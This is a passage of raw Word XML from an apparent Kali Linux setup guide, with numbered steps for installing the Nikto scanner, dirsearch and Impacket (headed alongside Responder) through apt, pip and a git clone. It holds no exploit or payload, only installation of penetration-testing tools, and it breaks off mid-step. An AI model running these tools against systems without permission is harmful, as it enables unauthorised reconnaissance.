          </w:tcPr>
          <w:p w14:paraId="15283E6F" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRPr="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Next, install the Nikto web scanner:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> nikto </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC7CB4" w14:paraId="792EB1B8" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6348FF39" w14:textId="763277EB" w:rsidR="00BC7CB4" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00BC7CB4">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="027408F9" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3888F513" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRPr="000D454E" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4693"/>
              </w:tabs>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">If you type </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7CB4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nikto </w:t>
            </w:r>
            <w:r>
              <w:t>now, it should be ready to use. Typing this command with no URL or host will provide a help page and show you the nikto version number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC7CB4" w14:paraId="1EA0C9E3" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0F64CC32" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="28FA4074" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23877503" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73254773" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832F285" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="002D71C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Installing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dirsearch </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4C27">
        <w:t>(Web page enumeration)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D71C1" w14:paraId="12055D2E" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="558EE04F" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23">
            <w:r>
              <w:t>24.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="65402A9D" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(dirsearch is not installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69AFA2CC" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23">
            <w:r>
              <w:t>Dirsearch is a web page/directory enumeration tool, used in a similar fashion to dirb and dirbuster, gobuster, etc.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To install, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0074575E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0074575E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0074575E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0074575E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D71C1" w14:paraId="7C6EDB57" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="72D464DB" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="592E19C5" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="589F9047" w14:textId="77777777" w:rsidR="002D71C1" w:rsidRDefault="002D71C1" w:rsidP="00045F23"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05E534BB" w14:textId="1D201729" w:rsidR="00690494" w:rsidRDefault="00690494">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB26A12" w14:textId="76A04F5F" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00754958">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Installing: </w:t>
      </w:r>
      <w:r w:rsidRPr="003F3EDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacket (GitHub Repository)</w:t>
      </w:r>
      <w:r w:rsidR="003F3EDB" w:rsidRPr="003F3EDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Responder</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00754958" w14:paraId="2CABEDC1" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="199C0397" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>25.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="11428389" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>impacket</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(as mentioned in 1.f)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Remember, impacket is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FBCE3C7" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>To install, first enter this command in terminal:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F551A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00F551A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7B2E4C" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> python3-pip</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This will ensure python installer (pip) is up to date.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00754958" w14:paraId="3FC9648B" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5ACCDE47" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>25.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0078297B" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CDC0570" w14:textId="30F26D89" w:rsidR="00754958" w:rsidRPr="00F551A9" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Now, we will clone the repository for impacket from Git with:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001B2315">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="001B2315">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> git clone</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C031FB" w:rsidRPr="00C031FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/SecureAuthCorp/impacket.git</w:t>
            </w:r>
            <w:r w:rsidR="00C031FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B2315">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/opt/impacket</w:t>
            </w:r>
            <w:r w:rsidR="00C031FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C031FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C031FB" w:rsidRPr="00C031FB">
              <w:t>(All one command, need a finger space to separate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00754958" w14:paraId="505BC2BC" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2C22F915" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>25.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="54BA6ED9" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F3B5AF8" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>Next, we use pip3 on the requirements.txt file, do so by typing:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731D914A" w14:textId="77777777" w:rsidR="00754958" w:rsidRPr="00FA7E21" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005933F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="005933F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F551A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install -r </w:t>
            </w:r>
            <w:r w:rsidRPr="00F551A9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/opt/impacket/requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00754958" w14:paraId="50E16A38" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6B4A9411" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>25.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="271F2DFD" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72340645" w14:textId="27E9B2CA" w:rsidR="00754958" w:rsidRPr="000D454E" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finally, </w:t>
            </w:r>
            <w:r w:rsidRPr="000D454E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/opt/impacket</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and then we use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>python3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">./setup.py </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA7E21">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r w:rsidR="00BF193F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:t>Or, without using cd, you can run command from any directory using:</w:t>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:rPr>
                <w:color w:val="FF0000"/>
